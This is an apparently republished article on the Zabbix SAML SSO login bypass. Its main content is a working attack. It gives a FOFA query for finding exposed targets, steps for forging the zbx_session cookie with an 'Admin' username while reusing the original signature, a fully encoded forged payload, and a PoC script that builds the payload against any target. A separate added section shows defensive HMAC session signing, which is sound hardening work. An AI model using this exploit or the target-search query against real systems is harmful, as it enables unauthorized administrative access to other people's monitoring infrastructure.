
How the Zabbix SAML SSO login bypass vulnerability works

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article introduces the Zabbix SAML SSO login bypass vulnerability and walks through its reproduction with a real case. The steps are simple and quick to follow, and the analysis is practical; I hope it helps you understand the problem.

I. Brief introduction

Zabbix is an enterprise-grade open source monitoring solution with a web interface that provides distributed system and network monitoring. Zabbix can monitor a wide range of network parameters to keep server systems running safely, and it offers a flexible notification mechanism so that administrators can quickly locate and resolve problems.

The Zabbix server monitors the status of remote servers and networks and collects data through SNMP, the Zabbix agent, ping, port checks and other methods. It runs on platforms such as Linux, Solaris, HP-UX, AIX, FreeBSD, OpenBSD and OS X.

The vulnerability arises when SAML SSO authentication is enabled (it is not enabled by default): the user identity stored in the client-side session data is trusted without being verified, so an unauthenticated attacker who modifies that session data can bypass the login page and reach the backend.

Preconditions for exploitation: SAML authentication must be enabled, and the attacker must know the user name of a valid Zabbix user.

II. FOFA query syntax

app="ZABBIX-Monitoring system" && body="SAML"

III. Reproduction steps

1. Locate Zabbix instances with the FOFA query above, open the home page, and read the value of the zbx_session parameter from the Set-Cookie response header.

2. URL-decode and then Base64-decode the zbx_session value to obtain its JSON content. Note that it carries only a sessionid and a sign field; there is no user identity yet:

{"sessionid": "67f71355eb96121f384ea0571290faca", "sign": "Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3. Build the payload by adding a saml_data object with a username_attribute field to the JSON. The original sign value is left untouched, which is exactly the point: the server does not bind the signature to the added saml_data field.

{"saml_data": {"username_attribute": "Admin"}, "sessionid": "67f71355eb96121f384ea0571290faca", "sign": "Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4. Base64-encode the constructed JSON and then URL-encode the result:

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5. Request index_sso.php, replacing the value of the zbx_session cookie in the HTTP request header with the URL-encoded payload.

6. The backend is reached as the named user without the login page ever having been passed.
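The defensive side of the steps above, as an added example that is not part of the original article and does not reproduce Zabbix's own signing scheme or its fix: a client-side session cookie in the same layout as the one shown (JSON, Base64, URL-encoding) is issued with an HMAC-SHA256 over every field except the signature itself, so that the step-3 manipulation (adding saml_data while keeping the old sign) fails verification. The secret key, the sessionid, the user names and the HMAC construction are all constructed for this example; `read_session_unverified` stands for the weak pattern the article describes and `read_session_verified` for the hardened one.

```python
import base64
import hashlib
import hmac
import json
import urllib.parse

# Constructed signing secret for this example only (assumption: a real server
# keeps such a key in server-side configuration, never inside the cookie).
SERVER_SECRET = b"example-session-signing-key-do-not-reuse"


def canonical(session: dict) -> bytes:
    """Serialise every field except 'sign' in a stable order, so the MAC covers
    all fields, including any later-added key such as saml_data."""
    body = {k: v for k, v in session.items() if k != "sign"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign_session(session: dict) -> dict:
    """Return a copy of the session carrying an HMAC-SHA256 'sign' field."""
    signed = dict(session)
    mac = hmac.new(SERVER_SECRET, canonical(session), hashlib.sha256).digest()
    signed["sign"] = base64.b64encode(mac).decode()
    return signed


def encode_cookie(session: dict) -> str:
    """Mirror the cookie layout from the article: JSON -> Base64 -> URL-encoding."""
    raw = base64.b64encode(json.dumps(session).encode()).decode()
    return urllib.parse.quote(raw)


def decode_cookie(cookie_value: str) -> dict:
    return json.loads(base64.b64decode(urllib.parse.unquote(cookie_value)))


def read_session_unverified(cookie_value: str) -> dict:
    """Weak pattern: trust whatever the client sent (the article's bug class)."""
    return decode_cookie(cookie_value)


def read_session_verified(cookie_value: str):
    """Hardened pattern: recompute the MAC over every field; None on mismatch.
    A None result is the place to log a tampering attempt with the client IP."""
    session = decode_cookie(cookie_value)
    expected = sign_session(session)["sign"]  # canonical() drops the old sign
    if not hmac.compare_digest(expected, str(session.get("sign", ""))):
        return None
    return session


def sso_user_from_cookie(cookie_value: str, verify: bool):
    """Return the SSO user name the server would act on, or None if rejected."""
    if verify:
        session = read_session_verified(cookie_value)
    else:
        session = read_session_unverified(cookie_value)
    if session is None:
        return None
    return session.get("saml_data", {}).get("username_attribute")


def tamper_like_article(cookie_value: str, username: str) -> str:
    """Step 3 of the article: add saml_data but keep the original sign."""
    session = decode_cookie(cookie_value)
    forged = {"saml_data": {"username_attribute": username},
              "sessionid": session["sessionid"],
              "sign": session["sign"]}
    return encode_cookie(forged)


def demo() -> dict:
    # Constructed pre-login session as the server would issue it: session id only.
    issued = encode_cookie(sign_session({"sessionid": "0123456789abcdef0123456789abcdef"}))
    forged = tamper_like_article(issued, "Admin")
    return {
        "unverified_user": sso_user_from_cookie(forged, verify=False),  # "Admin"
        "verified_user": sso_user_from_cookie(forged, verify=True),     # None
        "legit_ok": read_session_verified(issued) is not None,          # True
    }


if __name__ == "__main__":
    print(demo())
```

The design point is that the signature must be computed over the complete serialised session, in a canonical order, and compared in constant time; signing only the session id, or skipping the check on one code path such as the SSO entry point, leaves any field the client adds unprotected.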

The PoC below produces the constructed payload directly.

PoC:

import requests
import re
import urllib.parse
import base64
import json
import sys


def exp(target, username):
    # Fetch the home page and pull the zbx_session value out of Set-Cookie
    resp = requests.get(url=target, verify=False)
    cookie = resp.headers.get("Set-Cookie")
    zbx_session = re.findall(r"zbx_session=(.*?);", cookie)
    # URL-decode, then Base64-decode, then parse the session JSON
    url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
    base64_decode_data = base64.b64decode(url_decode_data)
    decode_to_str = str(base64_decode_data, encoding='utf-8')
    to_json = json.loads(decode_to_str)
    # Add saml_data while keeping the original sessionid and sign
    tmp_ojb = dict(saml_data=dict(username_attribute=username),
                   sessionid=to_json["sessionid"],
                   sign=to_json["sign"])
    payloadJson = json.dumps(tmp_ojb)
    print("decode_payload:", payloadJson)
    # Re-encode: JSON -> Base64 -> URL-encoding
    payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
    print("zbx_signed_session:", payload)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("argv error")
        exit(0)
    target = sys.argv[1]
    username = sys.argv[2]
    exp(target, username)

This concludes "How the Zabbix SAML SSO login bypass vulnerability works". Thank you for reading.
